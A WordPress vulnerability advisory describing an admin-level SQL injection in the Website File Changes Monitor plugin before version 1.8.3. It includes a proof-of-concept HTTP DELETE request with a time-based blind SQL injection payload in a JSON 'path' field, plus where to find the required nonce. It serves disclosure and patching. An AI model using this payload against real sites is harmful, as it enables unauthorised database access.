WordPress Plugin Vulnerabilities
Website File Changes Monitor < 1.8.3 - Admin+ SQLi
Description
The plugin does not sanitise and escape user input before using it in a SQL statement via an action available to users with the manage_options capability (by default admins), leading to an SQL injection
Proof of Concept
A user with manage_options permission can exploit the vulnerability with the following request :
DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1
Host: 127.0.0.1
X-WP-Nonce: 5732d8605b
Cookie: [redacted]
Content-Type: application/json
Content-Length: 54
{"path":"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'"}
The nonce required for the header "X-WP-Nonce" can be found in the source code of the page /wp-admin/admin.php?page=wfcm-file-changes, at the following line :
var wfcmData = {"restNonce":"5732d8605b","restAdminEndpoint":"http:\/\/127.0.0.1\/wp-json\/website-file-changes-monitor\/v1\/admin-notices","adminAjax":"http:\/\/127.0.0.1\/wp-admin\/admin-ajax.php"}; Affects Plugins
Fixed in version 1.8.3
References
Classification
Miscellaneous
Original Researcher
Nicolas VIDAL from TEHTRIS
Submitter
Nicolas VIDAL from TEHTRIS
Verified
Yes
Timeline
Publicly Published
2022-07-18 (about 2 months ago)
Added
2022-07-18 (about 2 months ago)
Last Updated
2022-07-18 (about 2 months ago)